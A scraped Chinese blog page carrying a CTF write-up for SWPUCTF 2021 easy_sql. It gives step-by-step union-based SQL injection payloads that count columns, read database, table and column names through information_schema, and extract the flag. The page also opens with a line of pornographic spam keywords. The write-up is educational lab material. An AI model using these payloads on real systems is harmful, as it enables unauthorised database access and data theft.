国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

字符型注入([SWPUCTF 2021 新生賽]easy_sql)

這篇具有很好參考價值的文章主要介紹了字符型注入([SWPUCTF 2021 新生賽]easy_sql)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

拿到題目,查看源碼,可知是要輸入?yún)?shù)wllm。

字符型注入([SWPUCTF 2021 新生賽]easy_sql),sql,數(shù)據(jù)庫,web安全,安全

輸入?yún)?shù)/?wllm=1,得到會顯

字符型注入([SWPUCTF 2021 新生賽]easy_sql),sql,數(shù)據(jù)庫,web安全,安全

繼續(xù)輸入?yún)?shù)/?wllm=1',報錯,確定為字符型漏洞

字符型注入([SWPUCTF 2021 新生賽]easy_sql),sql,數(shù)據(jù)庫,web安全,安全1.查看字段列表,發(fā)現(xiàn)在字段4報錯,確定為3列

?wllm=-1' order by 3--+
?wllm=-1' order by 4--+

字符型注入([SWPUCTF 2021 新生賽]easy_sql),sql,數(shù)據(jù)庫,web安全,安全

2.查看回顯

?wllm=-1' union select 1,2,3--+

字符型注入([SWPUCTF 2021 新生賽]easy_sql),sql,數(shù)據(jù)庫,web安全,安全

3.查詢數(shù)據(jù)庫名(test_db)

?wllm=-1' union select 1,2,database()--+

字符型注入([SWPUCTF 2021 新生賽]easy_sql),sql,數(shù)據(jù)庫,web安全,安全

4.查看test_db庫的表(users)

?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

字符型注入([SWPUCTF 2021 新生賽]easy_sql),sql,數(shù)據(jù)庫,web安全,安全

5.查詢字段

?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+

字符型注入([SWPUCTF 2021 新生賽]easy_sql),sql,數(shù)據(jù)庫,web安全,安全

6.出現(xiàn)flag字段,查看flag字段的內(nèi)容

/?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+ 

字符型注入([SWPUCTF 2021 新生賽]easy_sql),sql,數(shù)據(jù)庫,web安全,安全

出現(xiàn)flag字段,成功解出文章來源地址http://www.zghlxwxcb.cn/news/detail-698756.html

到了這里,關(guān)于字符型注入([SWPUCTF 2021 新生賽]easy_sql)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • Java字符串與字符型數(shù)組的轉(zhuǎn)換

    通過本章可以了解到字符串與字符型數(shù)組之間相互轉(zhuǎn)換的幾種方法。 文章目錄 一、字符串 —— 字符型數(shù)組? .toCharArray方法 .getChar方法 二、字符型數(shù)組 —— 字符串 .String方法 .copyValueOf方法 ? ? ? ? toCHarArray是將字符串中的一切字符均轉(zhuǎn)換為字符數(shù)組。 ? ? ? ? 用法為:字

    2024年02月15日
    瀏覽(24)
  • C語言整型轉(zhuǎn)字符型和字符型轉(zhuǎn)整型的簡便且有效的方法(對于自然數(shù))

    C語言整型轉(zhuǎn)字符型和字符型轉(zhuǎn)整型的簡便且有效的方法(對于自然數(shù))

    最近做到題目涉及數(shù)據(jù)類型的轉(zhuǎn)換,查了很多資料,發(fā)現(xiàn)博客上的文章在此方面不全面,特別是在整型轉(zhuǎn)成字符型上提供的方法不太好(指比較復(fù)雜),因此想做個總結(jié)。此方法主要涉及atoi,itoa和sprintf函數(shù)。 主要提供2種方法。 方法1:利用+‘0’將單個數(shù)字轉(zhuǎn)字符 代碼演示

    2024年02月15日
    瀏覽(22)
  • [SWPUCTF 2021 新生賽]pop

    [SWPUCTF 2021 新生賽]pop

    很明顯了 反序列化 pop 構(gòu)造pop鏈,主要還是 死盯 反序列化的魔法函數(shù) 從__destruct()入手,這里echo 可以調(diào)用到__toString __toString 調(diào)用 function Getflag() w44m類中兩個變量并不是共有屬性(關(guān)于屬性文末有鏈接) private:是PHP中類的私有成員 protected:是PHP中類的保護成員 所以我們就直

    2024年02月06日
    瀏覽(19)
  • [SWPUCTF 2021 新生賽]PseudoProtocols

    [SWPUCTF 2021 新生賽]PseudoProtocols

    base64解碼可得 php://input 此方法需要前提條件,即開啟 allow_url_include=On。 相當(dāng)于一個遠程包含的利用,php://打開文件流后,直接寫入惡意代碼。 data://text/plain, data://本身是數(shù)據(jù)流封裝器,他們原理類似,input是POST,而data是GET

    2024年02月05日
    瀏覽(20)
  • C++入門學(xué)習(xí)(十一)字符型

    C++入門學(xué)習(xí)(十一)字符型

    C++中的字符型可以表示ASCII碼中的所有字符,包括字母、數(shù)字、標點符號等。 ASCII碼是一種用于編碼字符的編碼系統(tǒng),它使用不同的數(shù)值來表示不同的字符。ASCII碼使用7位或8位二進制數(shù)來表示每個字符,因此可以表示128或256個不同的字符。 在ASCII碼中, 數(shù)字0-9的碼值為30-39

    2024年01月22日
    瀏覽(25)
  • Java語言:字符型的詳解、字符串的比較

    目錄 前言 一.字符型的知識 二.字符型比較大小 三.字符串比較 equals()方法 equalslgnoreCase()方法 compareTo() 方法 ??博主介紹:博客名為tq02,已學(xué)C語言、JavaSE,目前學(xué)了MySQL和JavaWeb ??學(xué)習(xí)專欄:??C語言? ? ? ? ?JavaSE? ? ? ?MySQL基礎(chǔ) ??博主鏈接:tq02的博客_CSDN博客-C語言,Ja

    2024年02月13日
    瀏覽(42)
  • C語言常量(整型、實型、字符型、字符串、符號常量)

    C語言常量(整型、實型、字符型、字符串、符號常量)

    對于C語言常量,該文章有詳講,由于文章太長,可參考如下思維導(dǎo)圖和目錄,可通過目錄選擇自己所需要的內(nèi)容閱讀。 整型常量即整數(shù),包括正整數(shù)、負整數(shù)和零。C語言中,整型常量可以用十進制、八進制、和十六進制表示。 十進制表示: 由數(shù)字0-9,正、負號組成,如3

    2024年02月07日
    瀏覽(24)
  • [SWPUCTF 2021 新生賽]babyrce(詳解)

    [SWPUCTF 2021 新生賽]babyrce(詳解)

    提示:沒有提示 文章目錄 前言 一、pandas是什么? 二、使用步驟 1.引入庫 2.讀入數(shù)據(jù) 總結(jié) 最近遇到的事太霉了,又是做到一半,靶機拒絕連接我,搞得我做題都不自信了 回到正文 題目 如下(示例):? 看了一下,就是cookie值admin等于1時,就能包含文件,行吧,那就等于吧

    2024年02月06日
    瀏覽(20)
  • [SWPUCTF 2021 新生賽]ez_unserialize

    [SWPUCTF 2021 新生賽]ez_unserialize

    題目在哪呢?查看源代碼試試 User-agent: * Disallow: 什么東西呢 發(fā)現(xiàn)disallow Robots 協(xié)議(也稱為爬蟲協(xié)議、機器人協(xié)議等)的全稱是 “網(wǎng)絡(luò)爬蟲排除標準”(Robots Exclusion Protocol),網(wǎng)站通過 Robots 協(xié)議告訴搜索引擎哪些頁面可抓,哪些頁面不能抓。 disallow就是爬蟲不能搜索的所以

    2024年02月05日
    瀏覽(11)
  • [SWPUCTF 2021 新生賽]easy_md5

    [SWPUCTF 2021 新生賽]easy_md5

    由于php中存在==的弱類型比較,所以我們可以通過hash比較的缺陷去繞過 比如: 也就是只要兩個數(shù)的md5加密后的值以0e開頭就可以繞過,因為php在進行弱類型比較(即==)時,會現(xiàn)轉(zhuǎn)換字符串的類型,在進行比較,而在比較是因為兩個數(shù)都是以0e開頭會被認為是科學(xué)計數(shù)法,0e后面

    2024年02月05日
    瀏覽(41)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包